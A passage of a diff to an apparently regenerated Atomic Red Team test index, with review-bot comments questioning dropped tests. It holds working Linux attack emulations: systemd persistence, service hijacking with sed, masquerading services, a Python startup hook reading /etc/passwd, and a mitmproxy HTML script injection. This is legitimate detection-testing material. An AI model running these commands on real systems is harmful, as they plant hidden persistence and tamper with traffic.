- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable.
Ensure systemd is installed."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Atomic Test Service" >> /etc/systemd/system/#{service_name}.service
echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{service_name}.service
echo "Restart=on-failure" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl enable #{service_name}.service
systemctl start #{service_name}.service
systemctl status #{service_name}.service
cleanup_command: |
systemctl stop #{service_name}.service 2>/dev/null || true
systemctl disable #{service_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
rm -f /tmp/atomic_service_output.txt
- name: Create systemd Service Unit from /tmp (Unusual Location)
auto_generated_guid: a1fa406e-2354-4a24-b6d6-94157e7564d4
description: |
Creates a systemd service unit file in /tmp and loads it using systemctl start with
an absolute path. Adversaries may write service unit files to world-writable directories
such as /tmp to avoid triggering alerts on new file creation in standard service
directories, or to execute payloads transiently without permanently installing a service.
Loading a service unit from an arbitrary path rather than a standard systemd directory
is unusual behaviour that should be detectable by monitoring systemctl command arguments.
supported_platforms:
- linux
input_arguments:
service_path:
description: Full path to the service file to be written in /tmp
type: path
default: "/tmp/atomic_tmp.service"
command_to_run:
description: Command the service will execute
type: string
default: /bin/bash -c "id > /tmp/atomic_tmp_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: "/tmp must exist and be writable\n"
prereq_command: 'if [ -d "/tmp" ] && [ -w "/tmp" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "/tmp does not exist or is not writable on this
system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > #{service_path}
echo "Description=Atomic Tmp Service" >> #{service_path}
echo "" >> #{service_path}
echo "[Service]" >> #{service_path}
echo "ExecStart=#{command_to_run}" >> #{service_path}
echo "" >> #{service_path}
echo "[Install]" >> #{service_path}
echo "WantedBy=multi-user.target" >> #{service_path}
systemctl link #{service_path}
systemctl start $(basename #{service_path})
systemctl status $(basename #{service_path})
cleanup_command: |
systemctl stop $(basename #{service_path}) 2>/dev/null || true
rm -f #{service_path}
rm -f /tmp/atomic_tmp_output.txt
- name: Create systemd Service Unit from /dev/shm (Unusual Location)
auto_generated_guid: dce49381-a26b-4d95-bdfa-c607ffe8bee5
description: |
Creates a systemd service unit file in /dev/shm and loads it using systemctl.
/dev/shm is a memory-backed filesystem that is world-writable on most Linux systems
and does not persist across reboots, making it particularly attractive to adversaries
seeking to execute transient payloads while evading file-based forensic detection.
This technique has been observed in post-exploitation scenarios where attackers
deliberately avoid writing to disk-backed locations to limit forensic artefacts.
supported_platforms:
- linux
input_arguments:
service_path:
description: Full path to the service file to be written in /dev/shm
type: path
default: "/dev/shm/atomic_shm.service"
command_to_run:
description: Command the service will execute
type: string
default: /bin/bash -c "whoami > /tmp/atomic_shm_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: "/dev/shm must exist and be writable\n"
prereq_command: 'if [ -d "/dev/shm" ] && [ -w "/dev/shm" ]; then exit 0; else
exit 1; fi
'
get_prereq_command: 'echo "/dev/shm does not exist or is not writable on this
system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > #{service_path}
echo "Description=Atomic SHM Service" >> #{service_path}
echo "" >> #{service_path}
echo "[Service]" >> #{service_path}
echo "ExecStart=#{command_to_run}" >> #{service_path}
echo "" >> #{service_path}
echo "[Install]" >> #{service_path}
echo "WantedBy=multi-user.target" >> #{service_path}
systemctl link #{service_path}
systemctl start $(basename #{service_path})
systemctl status $(basename #{service_path})
cleanup_command: |
systemctl stop $(basename #{service_path}) 2>/dev/null || true
rm -f #{service_path}
rm -f /tmp/atomic_shm_output.txt
- name: Modify Existing systemd Service to Execute Malicious Command
auto_generated_guid: 6123928f-6389-4914-8d25-a5d69bd657fa
description: |
Creates a service unit file that initially runs a benign command, then modifies the
ExecStart directive using sed to substitute a malicious command before reloading and
restarting the service. Adversaries may hijack existing services to blend in with normal
service activity and avoid triggering detections focused solely on new service creation.
This technique reflects the tradecraft observed in more sophisticated intrusions where
blending into existing process trees is a priority over creating net-new services.
supported_platforms:
- linux
input_arguments:
service_name:
description: Name of the service to create and then modify for the test
type: string
default: atomic-modify-test
malicious_command:
description: Malicious command to substitute into ExecStart
type: string
default: /bin/bash -c "echo hijacked > /tmp/atomic_hijack_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'sed must be available on the system
'
prereq_command: 'if [ -x "$(command -v sed)" ]; then exit 0; else exit 1;
fi
'
get_prereq_command: 'apt-get install -y sed 2>/dev/null || yum install -y
sed 2>/dev/null || echo "Could not install sed automatically."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Legitimate Looking Service" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=/bin/true" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
sed -i 's|ExecStart=.*|ExecStart=#{malicious_command}|' /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl start #{service_name}.service
systemctl status #{service_name}.service
cleanup_command: |
systemctl stop #{service_name}.service 2>/dev/null || true
systemctl disable #{service_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
rm -f /tmp/atomic_hijack_output.txt
- name: Execute Command via Transient systemd Service (systemd-run)
auto_generated_guid: a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236
description: |
Uses systemd-run to execute a command as a transient systemd service without creating
a persistent unit file on disk. Adversaries may use systemd-run to execute arbitrary
commands under the context of systemd while bypassing controls that monitor for new
unit file creation, since transient services exist only in memory for their lifetime.
This is a particularly stealthy technique as it leaves minimal on-disk artefacts and
the service disappears from systemctl list-units once execution completes.
supported_platforms:
- linux
input_arguments:
unit_name:
description: Name of the transient systemd unit to create
type: string
default: atomic-transient
command_to_run:
description: Command to execute as a transient service
type: string
default: /bin/bash -c "id > /tmp/atomic_transient_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemd-run must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi
'
get_prereq_command: 'echo "systemd-run is not available. Ensure systemd is
installed and up to date."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
executor:
name: sh
elevation_required: true
command: |
systemd-run --unit=#{unit_name} --wait #{command_to_run}
systemctl status #{unit_name}.service 2>/dev/null || echo "Transient service has already completed and exited."
cleanup_command: |
systemctl stop #{unit_name}.service 2>/dev/null || true
rm -f /tmp/atomic_transient_output.txt
- name: Enumerate All systemd Services Using systemctl
auto_generated_guid: 1e5be8d4-605a-4acb-8709-2f80b2d8ea95
description: |
Enumerates all systemd services and their current states using systemctl list-units
and systemctl list-unit-files. Adversaries may enumerate running and enabled services
to identify targets for hijacking, understand the host environment, map installed
security tooling, or identify gaps in monitoring coverage.
Service enumeration is a common reconnaissance step during post-exploitation and may
precede service hijacking or masquerading activity. This test does not require
elevation as service listing is available to unprivileged users on most Linux systems.
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
executor:
name: sh
elevation_required: false
command: |
systemctl list-units --type=service --all
systemctl list-unit-files --type=service
cleanup_command: 'echo "No cleanup required"
'
- name: Enable systemd Service for Persistence with Auto-Restart
auto_generated_guid: 2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7
description: |
Creates a payload script and a systemd service unit that executes it, then enables
the service to survive reboots using systemctl enable. The service is configured with
Restart=always to automatically restart on failure, mimicking the persistence mechanism
used by adversaries deploying backdoors or beacons on Linux hosts.
This technique is consistent with observed post-exploitation tradecraft where adversaries
establish a foothold that survives reboots and self-heals after interruption, complicating
incident response and remediation efforts.
supported_platforms:
- linux
input_arguments:
service_name:
description: Name of the persistence service to create
type: string
default: atomic-persist
payload_path:
description: Path to the payload script that the service will execute
type: path
default: "/tmp/atomic_payload.sh"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
'
- description: 'Payload script must exist at the specified path
'
prereq_command: 'if [ -f "#{payload_path}" ]; then exit 0; else exit 1; fi
'
get_prereq_command: |
echo '#!/bin/bash' > #{payload_path}
echo 'echo persistent >> /tmp/atomic_persist_output.txt' >> #{payload_path}
chmod +x #{payload_path}
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Atomic Persistence Service" >> /etc/systemd/system/#{service_name}.service
echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=#{payload_path}" >> /etc/systemd/system/#{service_name}.service
echo "Restart=always" >> /etc/systemd/system/#{service_name}.service
echo "RestartSec=10" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl enable #{service_name}.service
systemctl start #{service_name}.service
systemctl status #{service_name}.service
cleanup_command: |
systemctl stop #{service_name}.service 2>/dev/null || true
systemctl disable #{service_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{service_name}.service
rm -f /etc/systemd/system/multi-user.target.wants/#{service_name}.service
systemctl daemon-reload
rm -f #{payload_path}
rm -f /tmp/atomic_persist_output.txt
- name: Masquerade Malicious Service as Legitimate System Service
auto_generated_guid: 6fec8560-ff64-4bbf-bc79-734fea48f7ca
description: |
Creates a systemd service with a name and description closely resembling a legitimate
system service to blend in with normal service activity. Adversaries may deliberately
choose service names similar to well-known system services such as systemd-networkd,
cron, or ssh to evade detection from analysts reviewing service lists or automated
alerting on service names.
This masquerading technique is particularly effective in environments where detection
relies on service name allowlists or manual review of systemctl list-units output
rather than behavioural analysis of service unit file contents and ExecStart paths.
supported_platforms:
- linux
input_arguments:
masquerade_name:
description: Service name designed to closely mimic a legitimate system
service
type: string
default: systemd-network-helper
command_to_run:
description: Command the masquerading service will execute
type: string
default: /bin/bash -c "echo masquerade > /tmp/atomic_masquerade_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
'
- description: 'Chosen masquerade service name must not already exist as a real
service
'
prereq_command: 'if ! systemctl list-unit-files --type=service | grep -q "^#{masquerade_name}.service";
then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "A service named #{masquerade_name} already exists.
Change the masquerade_name input argument to avoid conflicts."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{masquerade_name}.service
echo "Description=Network connectivity helper service" >> /etc/systemd/system/#{masquerade_name}.service
echo "After=network.target" >> /etc/systemd/system/#{masquerade_name}.service
echo "Before=network-online.target" >> /etc/systemd/system/#{masquerade_name}.service
echo "" >> /etc/systemd/system/#{masquerade_name}.service
echo "[Service]" >> /etc/systemd/system/#{masquerade_name}.service
echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{masquerade_name}.service
echo "Restart=on-failure" >> /etc/systemd/system/#{masquerade_name}.service
echo "RestartSec=5" >> /etc/systemd/system/#{masquerade_name}.service
echo "" >> /etc/systemd/system/#{masquerade_name}.service
echo "[Install]" >> /etc/systemd/system/#{masquerade_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{masquerade_name}.service
systemctl daemon-reload
systemctl start #{masquerade_name}.service
systemctl status #{masquerade_name}.service
cleanup_command: |
systemctl stop #{masquerade_name}.service 2>/dev/null || true
systemctl disable #{masquerade_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{masquerade_name}.service
systemctl daemon-reload
rm -f /tmp/atomic_masquerade_output.txt
atomic_tests: []
T1059.009:
technique:
type: attack-pattern
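Review bot: this hunk removes the `identifier: T1569.003` key together with all eight systemctl atomic tests (create-and-enable, the /tmp and /dev/shm unit files, the sed ExecStart hijack, systemd-run, enumeration, the Restart=always persistence service and the masquerade test) and leaves `atomic_tests: []`, while the surrounding STIX fields (`x_mitre_version: '1.0'`, `x_mitre_remote_support: false`) are untouched. Nothing in the commit message explains a drop of this size, so please confirm that the new Python generator actually reads this technique's atomics YAML; if it does, show where the tests are now emitted, and if it does not, this is a silent loss of test coverage that should block the merge.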
@@ -34190,6 +33471,20 @@ persistence:
3. Click 'Select'
name: manual
- name: Chrome/Chromium (Chrome Web Store)
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
description: Install the "Minimum Viable Malicious Extension" Chrome extension
supported_platforms:
- linux
- windows
- macos
executor:
steps: |
1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
in Chrome
2. Click 'Add to Chrome'
name: manual
- name: Firefox
auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
description: 'Create a file called test.wma, with the duration of 30 seconds
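Review bot: the added Chrome/Chromium manual test gives install steps only and no removal step, so a run leaves the "Minimum Viable Malicious Extension" installed; please add a final step to remove it from the browser's extensions page, in the same numbered `steps` style the neighbouring manual tests use. The test also depends on the Web Store listing at the given URL staying published, which is worth stating in the description.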
@@ -34241,7 +33536,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -34262,7 +33557,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
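Review bot: `identifier: T1137.005` is dropped here even though `atomic_tests` was already `[]`, which shows the key removal is a schema change to the index rather than a side effect of losing tests. Consumers that read `identifier` will now have to take the technique ID from the mapping key (the `T1098.007:` form seen at the end of this hunk); that should be called out in the commit message, and any reader of the index updated in the same change.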
@@ -39275,7 +38569,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -39311,102 +38605,7 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (Linux)
auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
description: "Executes code by creating atomic_hook.pth in the site-packages
directory. \nThis script runs automatically for every user on the system when
Python starts.\n"
supported_platforms:
- linux
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
'
executor:
name: sh
elevation_required: false
command: |
TEMPDIR="/tmp/atomic_sitecust_posix"
mkdir -p "$TEMPDIR"
"#{python_exe}" -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
ls -la "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
cleanup_command: |
if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
rm -rf /tmp/atomic_sitecust_posix
echo "[+] Successful Removed atomic_hook.pth"
rm -rf /tmp/atomic_hook_poc.txt
echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
- name: Python Startup Hook - usercustomize.py (Linux / MacOS)
auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require root privileges.\n"
supported_platforms:
- linux
- macos
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
brew install python3 or brew install python@3.x or the macOS developer tools
(''xcode-select --install''))."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
cleanup_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
rm -rf /tmp/poc.txt
echo "[+] Successful remove poc.txt under /tmp"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
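Review bot: the `identifier: T1546.018` key and both Python startup hook tests (`atomic_hook.pth`, guid a58c066d-f2f0-42a2-ab70-30af73f89e66, and `usercustomize.py`, guid 6e78084a-a433-4702-a838-cc7b765d87e8) are removed and replaced with `atomic_tests: []`; the same removal appears earlier in this diff under another tactic, so the entry is emitted once per tactic and whatever restores the tests has to cover both copies. Please confirm this loss is unintended before merging.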
@@ -39891,7 +39090,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -39921,7 +39120,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -42100,7 +41298,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -42127,45 +41325,7 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests:
- name: DGA Simulation (Python)
auto_generated_guid: cc367493-3a00-4c4a-a685-16b73339167c
description: "Simulates Domain Generation Algorithm (DGA) traffic by generating
pseudo-random domains based on the current date and querying them using dig.
\nThis is designed to trigger DNS analytics and NGIDS.\n"
supported_platforms:
- linux
input_arguments:
python_script_path:
description: Full path to the DGA python script
type: string
default: PathToAtomicsFolder/T1568.002/src/T1568.002.py
dependency_executor_name: bash
dependencies:
- description: "#{python_script_path} must exist on system.\n"
prereq_command: 'if [ -f "#{python_script_path}" ]; then exit 0; else exit
1; fi
'
get_prereq_command: |
mkdir -p "$(dirname "#{python_script_path}")"
curl -sL "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1568.002/src/T1568.002.py" -o "#{python_script_path}"
- description: 'Python 3 must be installed to run the script.
'
prereq_command: 'which python3
'
get_prereq_command: 'sudo apt-get update && sudo apt-get install -y python3
'
executor:
command: 'python3 "#{python_script_path}"
'
name: bash
elevation_required: false
atomic_tests: []
T1071.004:
technique:
type: attack-pattern
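Review bot: the whole `DGA Simulation (Python)` test (guid cc367493-3a00-4c4a-a685-16b73339167c) disappears from T1568.002 and the entry collapses to `atomic_tests: []` (hunk header 45 lines to 7). This is a regenerated index, so a lost test points at the generator not loading that technique's atomic YAML; check the loader rather than accepting the empty list. If the test is kept, its `get_prereq_command` fetches the script from the `master` branch with `curl -sL` and no integrity check, so pinning to a commit or verifying a hash before running it would be the safer prereq.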
@@ -42566,68 +41726,7 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection
auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
description: Start mitmdump and verify injected header and HTML content.
supported_platforms:
- macos
- linux
dependencies:
- description: python3 must be installed
prereq_command: 'command -v python3
'
get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
apt-get install -y python3) || sudo yum install -y python3
'
- description: curl must be installed
prereq_command: 'command -v curl
'
get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
install -y curl) || sudo yum install -y curl
'
- description: pipx must be installed
prereq_command: 'pipx --version
'
get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
install -y pipx) || sudo yum install -y pipx
'
- description: mitmproxy must be installed
prereq_command: 'pipx list | grep mitmproxy
'
get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'lsof -i tcp:8080 | grep mitmdump
'
get_prereq_command: |
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
executor:
name: bash
command: |
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
cleanup_command: |
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
atomic_tests: []
T1205:
technique:
type: attack-pattern
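Review bot: the `MITM Proxy Injection` test for T1659 is removed entirely (68 lines to 7), the same empty `atomic_tests: []` pattern as the other technique hunks in this diff, so verify the generator before accepting the data change. For the record, the dropped test's cleanup runs `pkill -f mitmdump || true`, which terminates any mitmdump on the host rather than only the instance this test started on port 8080; if the test is reinstated, capture the PID from the backgrounded start in `get_prereq_command` and kill that PID instead.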
@@ -55523,7 +54622,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -55553,7 +54652,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
